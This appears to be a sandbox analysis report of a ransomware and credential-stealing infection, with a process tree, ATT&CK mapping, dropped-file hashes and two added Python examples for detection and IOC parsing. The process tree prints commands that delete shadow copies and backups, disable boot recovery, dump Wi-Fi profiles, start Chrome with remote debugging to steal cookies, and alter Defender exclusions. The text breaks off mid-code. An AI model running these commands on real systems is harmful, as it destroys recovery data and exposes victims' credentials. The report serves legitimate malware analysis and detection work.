      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      PID:2944
        C:\Users\Admin\AppData\Roaming\svchost.exe
          "C:\Users\Admin\AppData\Roaming\svchost.exe"
          - Drops startup file
          - Executes dropped EXE
          - Drops desktop.ini file(s)
          - Sets desktop wallpaper using registry
          - Modifies registry class
          - Suspicious behavior: AddClipboardFormatListener
          - Suspicious behavior: EnumeratesProcesses
          - Suspicious use of AdjustPrivilegeToken
          PID:2036
            C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C vssadmin delete shadows /all /quiet & wmic shadowcopy delete
              PID:3924
                C:\Windows\system32\vssadmin.exe
                  vssadmin delete shadows /all /quiet
                  - Interacts with shadow copies
                  PID:1920
                C:\Windows\System32\Wbem\WMIC.exe
                  wmic shadowcopy delete
                  - Suspicious use of AdjustPrivilegeToken
                  PID:3980
            C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures & bcdedit /set {default} recoveryenabled no
              PID:2692
                C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} bootstatuspolicy ignoreallfailures
                  - Modifies boot configuration data using bcdedit
                  PID:3460
                C:\Windows\system32\bcdedit.exe
                  bcdedit /set {default} recoveryenabled no
                  - Modifies boot configuration data using bcdedit
                  PID:5080
            C:\Windows\System32\cmd.exe
              "C:\Windows\System32\cmd.exe" /C wbadmin delete catalog -quiet
              PID:3876
                C:\Windows\system32\wbadmin.exe
                  wbadmin delete catalog -quiet
                  - Deletes backup catalog
                  PID:1032
            C:\Windows\system32\NOTEPAD.EXE
              "C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\AppData\Roaming\readme.txt
              - Opens file in notepad (likely ransom note)
              PID:2736
    C:\Users\Admin\AppData\Local\Temp\kernelv.exe
      "C:\Users\Admin\AppData\Local\Temp\kernelv.exe"
      - Executes dropped EXE
      - Accesses Microsoft Outlook profiles
      - System Location Discovery: System Language Discovery
      - Checks processor information in registry
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of WriteProcessMemory
      - outlook_office_path
      - outlook_win_path
      PID:4880
        C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Wi-Fi Discovery
          - Suspicious use of WriteProcessMemory
          PID:4576
            C:\Windows\SysWOW64\chcp.com
              chcp 65001
              - System Location Discovery: System Language Discovery
              PID:2476
            C:\Windows\SysWOW64\netsh.exe
              netsh wlan show profile
              - Event Triggered Execution: Netsh Helper DLL
              - System Location Discovery: System Language Discovery
              - System Network Configuration Discovery: Wi-Fi Discovery
              PID:3252
            C:\Windows\SysWOW64\findstr.exe
              findstr All
              - System Location Discovery: System Language Discovery
              PID:3428
        C:\Windows\SysWOW64\cmd.exe
          "cmd.exe" /C chcp 65001 && netsh wlan show networks mode=bssid
          - System Location Discovery: System Language Discovery
          PID:1008
            C:\Windows\SysWOW64\chcp.com
              chcp 65001
              - System Location Discovery: System Language Discovery
              PID:4784
            C:\Windows\SysWOW64\netsh.exe
              netsh wlan show networks mode=bssid
              - Event Triggered Execution: Netsh Helper DLL
              - System Location Discovery: System Language Discovery
              PID:5108
        C:\Program Files\Google\Chrome\Application\chrome.exe
          "C:\Program Files\Google\Chrome\Application\chrome.exe" --window-position=-2400,-2400 --remote-debugging-port=9222 --profile-directory="Default"
          - Uses browser remote debugging
          - Drops file in Windows directory
          - Enumerates system info in registry
          - Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
          - Suspicious use of AdjustPrivilegeToken
          - Suspicious use of FindShellTrayWindow
          - Suspicious use of WriteProcessMemory
          PID:1928
            C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=133.0.6943.60 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe30fbdcf8,0x7ffe30fbdd04,0x7ffe30fbdd10
              PID:1772
            C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --field-trial-handle=1448,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2152 /prefetch:11
              PID:4752
            C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --field-trial-handle=2172,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2168 /prefetch:2
              PID:2520
            C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --field-trial-handle=2304,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=2328 /prefetch:13
              PID:2860
            C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3292,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3340 /prefetch:1
              - Uses browser remote debugging
              PID:928
            C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3300,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=3360 /prefetch:1
              - Uses browser remote debugging
              PID:5036
            C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --extension-process --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=4264,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4300 /prefetch:9
              - Uses browser remote debugging
              PID:2604
            C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --string-annotations --enable-dinosaur-easter-egg-alt-images --remote-debugging-port=9222 --video-capture-use-gpu-memory-buffer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --field-trial-handle=4772,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4756 /prefetch:1
              - Uses browser remote debugging
              PID:2448
            C:\Program Files\Google\Chrome\Application\chrome.exe
              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=4892,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=4928 /prefetch:14
              PID:3020
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --field-trial-handle=5032,i,14137480744260120977,5946941764742743460,262144 --variations-seed-version=20250313-050105.095000 --mojo-platform-channel-handle=5044 /prefetch:144⤵PID:1452
-
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference -ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"2⤵
- Hide Artifacts: Ignore Process Interrupts
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1660
-
-
C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"C:\Program Files\Google\Chrome\Application\133.0.6943.60\elevation_service.exe"1⤵PID:3876
-
C:\Windows\system32\vssvc.exeC:\Windows\system32\vssvc.exe1⤵
- Suspicious use of AdjustPrivilegeToken
PID:2168
-
C:\Windows\system32\wbengine.exe"C:\Windows\system32\wbengine.exe"1⤵
- Suspicious use of AdjustPrivilegeToken
PID:4296
-
C:\Windows\System32\vdsldr.exeC:\Windows\System32\vdsldr.exe -Embedding1⤵PID:3528
-
C:\Windows\System32\vds.exeC:\Windows\System32\vds.exe1⤵
- Checks SCSI registry key(s)
PID:5096
-
C:\Windows\system32\BackgroundTransferHost.exe"BackgroundTransferHost.exe" -ServerName:BackgroundTransferHost.131⤵
- Modifies registry class
PID:2132
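Two things in the process tree above are worth a detection rule rather than a one-off note: a Chromium browser running with --remote-debugging-port=9222 (the DevTools protocol lets a local client read cookies and session data through the browser itself, which is what the "Uses browser remote debugging" signature is flagging), and PowerShell calling Remove-MpPreference on a Defender exclusion path (removing an exclusion is normally cleanup of one that was added earlier in the chain, so Add, Remove and Set all matter). The Python below is an added example, not tooling from the sandbox or from the malware; the sample events are constructed after the entries above (PIDs 1660, 928 and 5036 and their command lines are the report's; the parent PIDs, the root browser process pid 1928 and the benign rows 7001 and 7002 are invented), and the ATT&CK IDs are my mapping. Because Chrome copies the switch to every renderer, the rule attributes the finding to the browser process that was launched with the flag and lists the renderers as children instead of raising one alert per process.

```python
"""Triage process-creation events for browser remote debugging and Defender
exclusion tampering. Added example; not part of the sandbox report."""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str      # image file name only, e.g. "chrome.exe"
    cmdline: str


# Constructed sample modelled on the process tree in this report. PIDs 1660, 928 and
# 5036 and their command lines come from the report; the parent PIDs, the root
# browser process (pid 1928, ppid 4880) and the benign rows (7001, 7002) are invented.
SAMPLE_EVENTS = [
    ProcEvent(1660, 4100, "powershell.exe",
              r'powershell -NoProfile -ExecutionPolicy Bypass -Command "Remove-MpPreference '
              r'-ExclusionPath \"$env:TEMP\" -ErrorAction SilentlyContinue"'),
    ProcEvent(1928, 4880, "chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --headless '
              r'--remote-debugging-port=9222 --profile-directory=Default'),
    ProcEvent(928, 1928, "chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer '
              r'--remote-debugging-port=9222 --renderer-client-id=6 /prefetch:1'),
    ProcEvent(5036, 1928, "chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer '
              r'--remote-debugging-port=9222 --renderer-client-id=5 /prefetch:1'),
    ProcEvent(4752, 1928, "chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility '
              r'--utility-sub-type=network.mojom.NetworkService /prefetch:11'),
    ProcEvent(7001, 5600, "chrome.exe",
              r'"C:\Program Files\Google\Chrome\Application\chrome.exe" --profile-directory=Default'),
    ProcEvent(7002, 5600, "powershell.exe", r'powershell -Command "Get-MpPreference"'),
]

BROWSER_IMAGES = {"chrome.exe", "msedge.exe", "brave.exe", "chromium.exe", "opera.exe", "vivaldi.exe"}
# --remote-debugging-port=<n> or --remote-debugging-pipe (the pipe form has no port number)
REMOTE_DEBUG_RE = re.compile(r"--remote-debugging-(?:port=(\d+)|pipe)", re.I)
# Any MpPreference verb that touches an exclusion; Get-MpPreference is read-only and ignored
MPPREF_RE = re.compile(
    r"\b(Add|Remove|Set)-MpPreference\b(?=.*-Exclusion(?:Path|Process|Extension|IpAddress))",
    re.I | re.S)


def _is_flagged_browser(e):
    return e.image.lower() in BROWSER_IMAGES and REMOTE_DEBUG_RE.search(e.cmdline) is not None


def remote_debugging_roots(events):
    """Map root browser pid -> {"port": int or None, "children": [pids]}.

    Chrome copies the switch to its renderers, so every child carries it; walk up
    the tree and attribute the finding to the highest browser process that has it."""
    by_pid = {e.pid: e for e in events}
    roots = {}
    for e in events:
        if not _is_flagged_browser(e):
            continue
        root = e
        while by_pid.get(root.ppid) is not None and _is_flagged_browser(by_pid[root.ppid]):
            root = by_pid[root.ppid]
        m = REMOTE_DEBUG_RE.search(root.cmdline)
        port = int(m.group(1)) if m.group(1) else None
        entry = roots.setdefault(root.pid, {"port": port, "children": []})
        if e.pid != root.pid:
            entry["children"].append(e.pid)
    for entry in roots.values():
        entry["children"].sort()
    return roots


def defender_exclusion_changes(events):
    """[(pid, verb)] for PowerShell command lines that add, remove or set an exclusion."""
    hits = []
    for e in events:
        if e.image.lower() not in {"powershell.exe", "pwsh.exe"}:
            continue
        m = MPPREF_RE.search(e.cmdline)
        if m:
            hits.append((e.pid, m.group(1).capitalize()))
    return hits


def triage(events):
    findings = []
    for pid, info in remote_debugging_roots(events).items():
        findings.append({
            "technique": "T1539",       # Steal Web Session Cookie (listed in the report's ATT&CK table)
            "pid": pid, "port": info["port"], "children": info["children"],
            "reason": "browser launched with DevTools remote debugging enabled",
        })
    for pid, verb in defender_exclusion_changes(events):
        findings.append({
            "technique": "T1562.001",   # Impair Defenses: Disable or Modify Tools (my mapping)
            "pid": pid, "verb": verb,
            "reason": f"{verb}-MpPreference changed a Defender exclusion",
        })
    return findings


if __name__ == "__main__":
    for finding in triage(SAMPLE_EVENTS):
        print(finding)
```

On real telemetry (Sysmon event 1 or EDR process-start records) the image and parent pid fields map straight onto ProcEvent; the root-attribution step is what keeps a headless browser from producing one alert per renderer, and the port it reports is the local TCP port a stealer would connect to with the DevTools protocol.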
Network
MITRE ATT&CK Enterprise v15
Execution
- Command and Scripting Interpreter (2)
  - PowerShell (1)
- Windows Management Instrumentation (1)
Persistence
- Event Triggered Execution (1)
  - Netsh Helper DLL (1)
- Modify Authentication Process (1)
Defense Evasion
- Direct Volume Access (1)
- Hide Artifacts (1)
  - Ignore Process Interrupts (1)
- Indicator Removal (3)
  - File Deletion (3)
- Modify Authentication Process (1)
- Modify Registry (1)
Credential Access
- Credentials from Password Stores (1)
  - Credentials from Web Browsers (1)
- Modify Authentication Process (1)
- Steal Web Session Cookie (1)
- Unsecured Credentials (2)
  - Credentials In Files (2)
Downloads
-
Filesize
1B
MD5d1457b72c3fb323a2671125aef3eab5d
SHA15bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA2568a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0
-
Filesize
40B
MD51d6d1e773c2cb63516dc875f48b6b40c
SHA180bcca5dd15ffceb74ffe8b17a31e5d46da41473
SHA2562e7ec8cb08e6856724817c7e0a64c9f38118ceb1c4c79f751ac31640a9e230d1
SHA512becd167da74904fbdf8540b4d3782bc20c4f8551afa7c6261d1a8fff797bb160a5e3334bef30dc79a4d5416700055623e3f279e8b4c4bc4c0041bc49d16cb119
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log
Filesize87B
MD5e4a639b9d8bf7a90cc97bb4e05a36753
SHA1676facdabf06e5f014e95218bfc02b8c18c39284
SHA25679da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd
SHA5124a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
SHA2564f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af
-
Filesize
3KB
MD5662e55efd63947ac1ed9ab166fde4448
SHA1ffdefed29e194510e0c86cb9063c2b6bf4b87223
SHA25645e102a0dd571dc77afbf39c16f4007c44d643c58168b299f3a69a4769fb3793
SHA51260b54ae86eb59911b0c2bd5f2420961fceaac2e3140039c9139c65902dfbf63eb8f19dec2ac4674d6c6b3dd2b4082e461bc53556912f7eb8f634d66c17cc0d1a
-
Filesize
289B
MD5541c42f1c98b3e1b011d22eba854e707
SHA1db30188de1f22e3077e7044be1386a5d0ecaed9d
SHA2560768e811c51ac61a8e573ac6b53f89dbb1d89eb2fcf62536a9a5f730329c584b
SHA51247828c1b40deb8d37d6ff4fc8f7673fbb59b40e07f54f0fa4121b91941160134c251e20f7f28f7ee5185f3c8aee2b7e95a1bef573bc64c68912016accbe90604
-
Filesize
17KB
MD54786cf24e3e07c212272a4c2c0aa6aad
SHA16948ce944e1dde09aafee35b61b7fee15537a785
SHA25601637344a86333f59012fe115b1be0a8366587e176809918a2723a6878a23cdc
SHA5126434ad876770eb4bb9e91c4ebb206c41f3b4d0d715ec363c8669d4b595fdd740ac3004855d482c71588f1f7bd4762d427974a4fce31dc50ad633d84d4f132654
-
Filesize
1KB
MD556220f7b661c85b776763c1a0f189326
SHA164e8d4898867dafa9de8b87862808a1ac05a1239
SHA2566371d04275f796eebfdf9ab3c879f32a58af4cb04001598b8d109836b864b872
SHA5123071338a1f5c80016f409105efd2367baa4f3742bdaaf41a97794f66670f246ff24f3c11c2fc26e5d33c17f33c3d19a2301fcf4be8ca239f0a903c3b8a2892db
-
Filesize
80KB
MD538e61cfd456cf804da8e5d148eacf796
SHA10350a98c12d3b1996feca7f0c52be22dcb6079b3
SHA2560f9fbf41d1153581a399ba5a5b1a3b785a4351161d6d650d19165a43f64185d8
SHA51296ac64dc5a0b4e9e4b5314d83a21ab725ed64d45579875bf8f4a62401d13c598b9f6535b431f55198983830daa750467153643a0140e15d9ec4377db043c5eae
-
Filesize
226B
MD54ae344179932dc8e2c6fe2079f9753ef
SHA160eacc624412b1f34809780769e3b212f138ea9c
SHA2563063de3898a9b34e19f8cf0beeec2b8bd6bd05896b52abd73f4703d07b8a7cd4
SHA512fadfe2b83f1af8fdc50430325f69d6172d2c1e889ca3800b3b83e5535d5970c32e9a176b48563275a0630d56c96d9f88df148fd6b2d281f0fc58129e5f4dba19
-
Filesize
2KB
MD5627073ee3ca9676911bee35548eff2b8
SHA14c4b68c65e2cab9864b51167d710aa29ebdcff2e
SHA25685b280a39fc31ba1e15fb06102a05b8405ff3b82feb181d4170f04e466dd647c
SHA5123c5f6c03e253b83c57e8d6f0334187dbdcdf4fa549eecd36cbc1322dca6d3ca891dc6a019c49ec2eafb88f82d0434299c31e4dfaab123acb42e0546218f311fb
-
Filesize
944B
MD505b3cd21c1ec02f04caba773186ee8d0
SHA139e790bfe10abf55b74dfb3603df8fcf6b5e6edb
SHA256911efc5cf9cbeb697543eb3242f5297e1be46dd6603a390140a9ff031ed9e1e8
SHA512e751008b032394817beb46937fd93a73be97254c2be94dd42f22fb1306d2715c653ece16fa96eab1a3e73811936768cea6b37888437086fc6f3e3e793a2515eb
-
Filesize
1KB
MD5318b7468f95ad6548bb6b631a14863dd
SHA177e835ce5092cf8d6b04dbb42a2f4c66e63a1557
SHA256dd795b9f7d426c42a8f35cda8e2223c41a5b41560cff651ae2ec89f9aeb16555
SHA5120fe428f2607bceae4bd947417aa68dcff8eaf3bc328c88904fd0cc6a1b2e1ec9eda7fb216783476b811ea0a12199fea54751c9ba5e4d746c7c6f0a9a888ef76f
-
Filesize
1KB
MD5dd3474e6a72c08266c25f196f78b13fd
SHA1b70c6bbd7794b49b6b9afa6343987a7f553d1268
SHA25682acd1c6613bb2c907a26be1f61f6556ee03cabf1aa73dad27d012be88e05318
SHA512cf5138ab09f19034fa5d058819956fd0556c56d674268e496dbaded228839d2be576bd74cda26127adf03cce9a8ab485ce6a07c7332a2c65a77ca9b56d92c79d
-
C:\Users\Admin\AppData\Local\Packages\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\AC\BackgroundTransferApi\267aad0b-2fdd-4292-8bff-59b3a5d8a384.down_data
Filesize555KB
MD55683c0028832cae4ef93ca39c8ac5029
SHA1248755e4e1db552e0b6f8651b04ca6d1b31a86fb
SHA256855abd360d8a8d6974eba92b70cbd09ce519bc8773439993f9ab37cb6847309e
SHA512aba434bd29be191c823b02ea9b639beb10647bbe7759bbffdaa790dfb1ec2c58d74c525ef11aacda209e4effe322d1d3a07b115446c8914b07a3bce4d8a0e2c3
-
Filesize
407KB
MD5b077dab664a004215814a4391b6dde66
SHA1c3c2f1138317225ae98f616b080370cefa082c18
SHA256726afcaa627b24e176cec78f636df4a66847f0716ea0e1161745d0c5616b5bae
SHA5122927dd7361048783dba4324def7859b72b415045272278064dbfb024251b22e899e7b4f603f2b59d312855a9674c6ad2d2068eee7811e7079bc00a91fc5cc247
-
Filesize
23B
MD5f19d961388cd1c4572942a4f1397d15d
SHA195a89992f4fe50c0a6f4351c3f93c14487087844
SHA256052caba139f51903bc4994a3cace4e65c87fd093b6efec8141e4a6c4625e380d
SHA51266a82f3216189a50df4ca19194a1eda2989e6635fc115508d9c0b2a33b3345f657a17214c52ed78999eb8a3e571199e70c3ae4854deaa7eb1f380af7f6f8fb09
-
Filesize
19B
MD5c5b94f01b5b97e31f9cec28fecefe0b1
SHA15a2f650235d6319696f02a10a0393b47dbddcd81
SHA256bf9eec15e97a4addb7f3b9a15f2de3b5499428750e3ecf1cbad5e3bad5e00548
SHA5128e6a75963a9e613ee3a5fe4032c42898904426c19541ec54404811482ef8aac4f84ff23bd80d72f0d33215dcde7d008fcd4687c79ba35cac5b4240c5ad5b109b
-
Filesize
17B
MD5964d5571d9a4fec576fe454162f2e844
SHA16234d1102a5012094dc8818bc045f7890d270905
SHA2566cfad5b342f80a79633747ee591775dbf46be34fbc793930e5de9aab7afb9995
SHA512402b81b47e62fa0d2b993eb01df725d1f3ec826ed76c0ac17d5ebaed048e6c7556ac2e1b3c0141e2347386cb5c7c74377c37f990ba9b5745f388181153b8a46c
-
Filesize
17B
MD5b80546283f231ee762dee4b33b0aa091
SHA1ec5a0f5581d8d9e9784f82b77e4e0eb187d78301
SHA256188352fe4a40938e0918eed1c4b0ae7266fb13c9de77330e04f192711d15c6f8
SHA512df1519614443b80b22a601ca4f1b4119eeaef0715fe913dd327a7c247986cba16cbbd7f55e32ea0557b5e5338897c0f82ac23e91d69836ad280c7f587d863d51
-
Filesize
19B
MD5c4efd9a7b61ebf43b608440be5e33369
SHA1926418256c277f1b11b575ec6e92ce6a844612f7
SHA256ed4280859199da5a8f25c0c6d533d0873460ac63368c14a69bbd863ea4bfb30f
SHA5129ea97363868d61d3d51bd3804d638b71ba8dc65260800b3a54051b4725cf08e9d9880a12422a549d94a339c7267e858a7ff5ca9428d64051657134b5c6c20745
-
Filesize
81B
MD5ea511fc534efd031f852fcf490b76104
SHA1573e5fa397bc953df5422abbeb1a52bf94f7cf00
SHA256e5fe7f327ae62df007bd1117aa7f522dbbcd371ec67953f66d786424cb1d7995
SHA512f7d8e575a2332b0fbd491b5e092b7ed6b0942a5165557fcc5d215d873b05103aa6ba01843133871c1c7ac81b10182a15895be49885c98d1a379dd55f88004fae
-
Filesize
407KB
MD53625ed17a6255827969ad5a404f0e41e
SHA187922c687d7c31aef6b20da03c4621b03a617028
SHA256c7fcc119a5fcf6b96a186e837887c22c2d1b59de5fb3c263911843f9cc6b9be3
SHA5124bd2de013dad5a094a3a28fe171fc0ebe97dfcda5413fc3d0d1f0aced57cc892d0a0835708e42cae720c71befa02604590638cc9ba2f4b260abf14b5d67bfc16
-
Filesize
354B
MD520a03bf7481ae6484d0623abb566212c
SHA108e6067ea2ec07126473066a53855d1f743718bd
SHA25644cdd1e35dba8a35672a3f58067b50932f4088298f5e1ecf9a448b3e73380ee7
SHA512e3d12f0c103268ae5030345e38c49daa90f6e41c9d9b6294fe97fa0e0032c732682f6e27356ffbbf1611c3e8482dfccefc0859444d054fcbc3c826d649b8dd34
-
Filesize
4KB
MD5aaafa9bad52c6b8832bfe6049e3ea677
SHA17c079d194986f77a65bfa3d8f22168e9b584f477
SHA256bd4bdcc0eb7b4567b94b146b2c36c5e4c423eb3606475b795c64171591fc31aa
SHA5123d5420df3a27cc8aa9902294b8ae5990e3bdb718a71dc1387546a4b6db444a46d9db25401a391a2c50e0bf528870366fd98144eb5d0ebeb6b4dc7ee64cb91b9b
-
Filesize
5KB
MD5368d379c84bd87dc5750b0a91088f604
SHA13949b00b0abddba67fe05fb8f1c02b22c519eca4
SHA25675e31026665a23adfaebf4ab95f2f5e45f59500c0dcc762502bb4a234b5dbcbf
SHA5129074f42972b6e523ba89528d3a6b147ca5cafedb16920a612306a6c9bb764dd09320fb8d05df1aa34e85d72e59ab32d537900dffb86a00aadceec4ddd94150cd
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
137KB
MD57605fb5c749eeea0b1b27fdaad78051c
SHA128388bf016af085bbcbacf8c516853942f6ec8d3
SHA256466a92e378a95752870abddd6af278fba89c5fef2cb3adfe2c4c114b9bd7cd93
SHA5121a3780652e092bd0be5c45cf034b2d0737324009c4d7d74e5cca193f75f285be85fa1631a68c6955566206dc3d51ba2dab9c4acfc74f9652ed2c04976ae3ee54
-
Filesize
250KB
MD53252df0bec85cdcd3668d703ceaf09ce
SHA1672366ae8df248c078db68a226d1fbf564d2f8ea
SHA25602fa2665e5759db60b61da15b757150eda402ff6063a30a855a337d813fe8229
SHA512179cab2e7d2cdc2cadc7a20986751007c10e6650069152df23d13bc1fef9fe5e066356f21825a325d34ea091c2b4e0766df1fabee8797da11a73de18dc46370f
-
Filesize
780B
MD560d646f40556d78166ad8111d850fc51
SHA1babaaf0762000dbf4b3f7a93beb35b6d9279d94d
SHA256a66f43f9660c0b16c59eb22b1037c19af06f89d875344446cc63e90437f78fab
SHA5123fb8acd626a012402669e42e760dd5b0efe2d2a37f3e71310c4a80a14491ee973713fcb0d90f99d40f0749c1dd16e8153afcb757e25de34c9ec9c82a58e81bc6
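The dropped-file list above is the part of the report most people copy into a blocklist, so it should be parsed rather than scraped by eye: the labels are fused to the digests, the size is sometimes on its own line, and a digest that lost a character in transit must be rejected, not shipped. The Python below is an added example, not the sandbox's own tooling. The embedded excerpt is four records copied from the list above in the same flattened layout; the candidate contents tried against the tiny records (an empty file, `[]`, `{}`, a bare newline) are my assumption about what empty Chrome profile state files usually hold.

```python
"""Parse the flattened dropped-file list of this report into IOC records and
match file contents against it. Added example; not part of the sandbox report."""
import hashlib
import re
from dataclasses import dataclass, field

# Constructed excerpt: four records copied from the Downloads list above.
SAMPLE_REPORT = r"""
-
Filesize
1B
MD5d1457b72c3fb323a2671125aef3eab5d
SHA15bab61eb53176449e25c2c82f172b82cb13ffb9d
SHA2568a8de823d5ed3e12746a62ef169bcf372be0ca44f0a1236abc35df05d96928e1
SHA512ca63c07ad35d8c9fb0c92d6146759b122d4ec5d3f67ebe2f30ddb69f9e6c9fd3bf31a5e408b08f1d4d9cd68120cced9e57f010bef3cde97653fed5470da7d1a0
-
Filesize
40B
MD51d6d1e773c2cb63516dc875f48b6b40c
SHA180bcca5dd15ffceb74ffe8b17a31e5d46da41473
SHA2562e7ec8cb08e6856724817c7e0a64c9f38118ceb1c4c79f751ac31640a9e230d1
SHA512becd167da74904fbdf8540b4d3782bc20c4f8551afa7c6261d1a8fff797bb160a5e3334bef30dc79a4d5416700055623e3f279e8b4c4bc4c0041bc49d16cb119
-
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ghbmnnjooekpmoecnnnilnnbdlolhkhi\000003.log
Filesize87B
MD5e4a639b9d8bf7a90cc97bb4e05a36753
SHA1676facdabf06e5f014e95218bfc02b8c18c39284
SHA25679da0e95b23e5777bee595201fead887021d71ddaffa79dac8d5cf03a646b8cd
SHA5124a254245e0af42a2a86647ed24301f4f82a72c0dedad67df32317c2acdb8a7f2e5db8336871611419776e6a1cc1c35933cc5f4cb16648b51b6a401a14087d104
-
Filesize
2B
MD5d751713988987e9331980363e24189ce
SHA197d170e1550eee4afc0af065b78cda302a97674c
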